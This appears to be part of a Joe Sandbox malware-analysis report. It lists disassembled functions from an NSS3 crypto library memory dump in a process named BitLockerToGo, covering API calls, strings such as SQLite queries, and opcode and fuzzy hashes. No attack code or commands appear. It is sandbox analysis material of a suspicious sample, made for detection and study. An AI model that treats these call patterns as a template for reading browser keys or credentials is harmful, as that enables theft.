                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3791087267-1256704202
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a4deba19014c782260ce67b717725d7c4e9a9591e26fc3897e6dd9a6b33ebe4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b2e06e671dbd484800df9397b1a0df8a2acaf9d531f9bb237f03b3710043db3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a4deba19014c782260ce67b717725d7c4e9a9591e26fc3897e6dd9a6b33ebe4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61C10674E052559FEF108FE89C40BBE7BB8AF06308F141065EC55A7B01EBA1ED16C7A9
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A7C33
                                                                                                                                                                                                                                                                                                                                                          • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C6A7C66
                                                                                                                                                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C6A7D1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: SECOID_FindOID_Util.NSS3(?,?,?,6C6A91C5), ref: 6C6A788F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6A7D48
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C6A7D71
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6A7DD3
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6A7DE1
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A7DF8
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6A7E1A
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C6A7E58
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6A91C5), ref: 6C6A78BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C6A91C5), ref: 6C6A78FA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C6A91C5), ref: 6C6A7930
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A91C5), ref: 6C6A7951
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6A7964
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C6A797A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C6A7988
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C6A7998
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: free.MOZGLUE(00000000), ref: 6C6A79A7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C6A91C5), ref: 6C6A79BB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C6A91C5), ref: 6C6A79CA
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6A7E49
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6A7F8C
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6A7F98
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6A7FBF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6A7FD9
                                                                                                                                                                                                                                                                                                                                                          • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C6A8038
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6A8050
                                                                                                                                                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C6A8093
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C6A7F29
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6A8072
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3 ref: 6C6A80F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ABC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C6A800A,00000000,?,00000000,?), ref: 6C6ABC3F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$Error$Zfree$DestroyPublic$Find$Alloc_CopyHashImportK11_LookupTablememcpy$AlgorithmCertificateConstCurrentEncryptedInfoOptionPrivateReturnTag_Threadfreestrchrstrcmpstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2815116071-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e411b6e5fd104b4ac84a1922a1a8ae49de7329b9313c70ea4b9c7cec3905e779
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fac4ee9ab45a6d9ad8db3afce295e6388645df912925f7f5d722949a5860aa28
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e411b6e5fd104b4ac84a1922a1a8ae49de7329b9313c70ea4b9c7cec3905e779
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64E1B4716083019FD700CF65C840B5BB7E5BF49308F14496DE89A9BB65E731EC16CB9A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 6C631C6B
                                                                                                                                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C631C75
                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000400,00000004,?,00000400,?), ref: 6C631CA1
                                                                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C631CA9
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C631CB4
                                                                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C631CCC
                                                                                                                                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000005(TokenIntegrityLevel),?,00000400,?), ref: 6C631CE4
                                                                                                                                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 6C631CEC
                                                                                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C631CFD
                                                                                                                                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 6C631D0F
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C631D17
                                                                                                                                                                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32 ref: 6C631D4D
                                                                                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C631D73
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(_PR_NT_InitSids: OpenProcessToken() failed. Error: %d,00000000), ref: 6C631D7F
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • _PR_NT_InitSids: OpenProcessToken() failed. Error: %d, xrefs: 6C631D7A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                                                                                                                                                                                                                                                                                                          • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3748115541-1216436346
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 95ae6840e3a57ccb9b5e99de488786dce62fbf95eee93a848fa6911c7141639d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8bb65205cf132d75e24fe9fc901638923874ddb330d036f44d018464ec3c92a7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95ae6840e3a57ccb9b5e99de488786dce62fbf95eee93a848fa6911c7141639d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19314FB1A00218AFEF11AF64CD48BAABBB8FF4A345F044175FA0992250EB305995CF65
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C633DFB
                                                                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C633EEC
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C633FA3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000001), ref: 6C634047
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6340DE
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C63415F
                                                                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C63416B
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C634288
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6342AB
                                                                                                                                                                                                                                                                                                                                                          • __allrem.LIBCMT ref: 6C6342B7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                                                                                                                                                                                                                                                                                                          • String ID: %02d$%03d$%04d$%lld
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 703928654-3678606288
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7751df27761850c232e1593c8a612a60a626b6e15fdde9b025a4a47d1ac10574
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 40961d99e09820e11a64e8aedb440fcb0c92419e826baa0a8fb378904b95c740
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7751df27761850c232e1593c8a612a60a626b6e15fdde9b025a4a47d1ac10574
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F16471A087408FD715CF38C880BABFBF6AF85304F10AA2DF48997651EB71D8468B46
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5E1D58
                                                                                                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5E1EFD
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6C5E1FB7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6C5E1F83
                                                                                                                                                                                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 6C5E20CA
                                                                                                                                                                                                                                                                                                                                                          • no more rows available, xrefs: 6C5E2264
                                                                                                                                                                                                                                                                                                                                                          • unknown error, xrefs: 6C5E2291
                                                                                                                                                                                                                                                                                                                                                          • sqlite_temp_master, xrefs: 6C5E1C5C
                                                                                                                                                                                                                                                                                                                                                          • another row available, xrefs: 6C5E2287
                                                                                                                                                                                                                                                                                                                                                          • unsupported file format, xrefs: 6C5E2188
                                                                                                                                                                                                                                                                                                                                                          • abort due to ROLLBACK, xrefs: 6C5E2223
                                                                                                                                                                                                                                                                                                                                                          • sqlite_master, xrefs: 6C5E1C61
                                                                                                                                                                                                                                                                                                                                                          • table, xrefs: 6C5E1C8B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                                                                                                                                                                                                                                                                                                          • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 563213449-2102270813
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 06aaceab938c9cfcd0afd2d22c3d0b7733eda69030daa40113f705a1f91c97f2
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8342a53a51849f60457d5aea12e47577b76b929f68c2c201fe7eb81c45093eaa
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06aaceab938c9cfcd0afd2d22c3d0b7733eda69030daa40113f705a1f91c97f2
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A712E2706083428FD715CF19CC84A5ABBF2BF89318F18896DE8958BB56D731EC45CB92
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6ADAE2,?), ref: 6C6AC6C2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AF0AE
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AF0C8
                                                                                                                                                                                                                                                                                                                                                          • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C6AF101
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6AF11D
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C77218C), ref: 6C6AF183
                                                                                                                                                                                                                                                                                                                                                          • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C6AF19A
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6AF1CB
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C6AF1EF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C6AF210
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C6AF1E9,?,00000000,?,?), ref: 6C6552F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C65530F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C655326
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6552D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C6AF1E9,?,00000000,?,?), ref: 6C655340
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6AF227
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C6AF23E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C64E708,00000000,00000000,00000004,00000000), ref: 6C69BE6A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6504DC,?), ref: 6C69BE7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C69BEC2
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6AF2BB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C6AF3A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C6AF3B3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C652D20: PK11_DestroyObject.NSS3(?,?), ref: 6C652D3C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C652D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C652D5F
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1559028977-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d92be8fbebf74752fcaaf11a2f74866d854dc302c72d9325c4ae94115c7fce6
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1bbc2820c64ca702d03ddd1d6fdc97257225fc469eb2c2831c14790637dd1f60
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d92be8fbebf74752fcaaf11a2f74866d854dc302c72d9325c4ae94115c7fce6
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FD190B5E016059FDB10CFE9D880A9EB7F5EF49308F158029E915A7711EB31EC06CB9A
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C667DDC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C648298,?,?,?,6C63FCE5,?), ref: 6C6A07BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6A07E6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A081B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6A0825
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C667DF3
                                                                                                                                                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C667F07
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetPadMechanism.NSS3(00000000), ref: 6C667F57
                                                                                                                                                                                                                                                                                                                                                          • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C667F98
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C667FC9
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C667FDE
                                                                                                                                                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C668000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C689430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C667F0C,?,00000000,00000000,00000000,?), ref: 6C68943B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C689430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C68946B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C689430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C689546
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C668110
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C66811D
                                                                                                                                                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C66822D
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C66823C
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
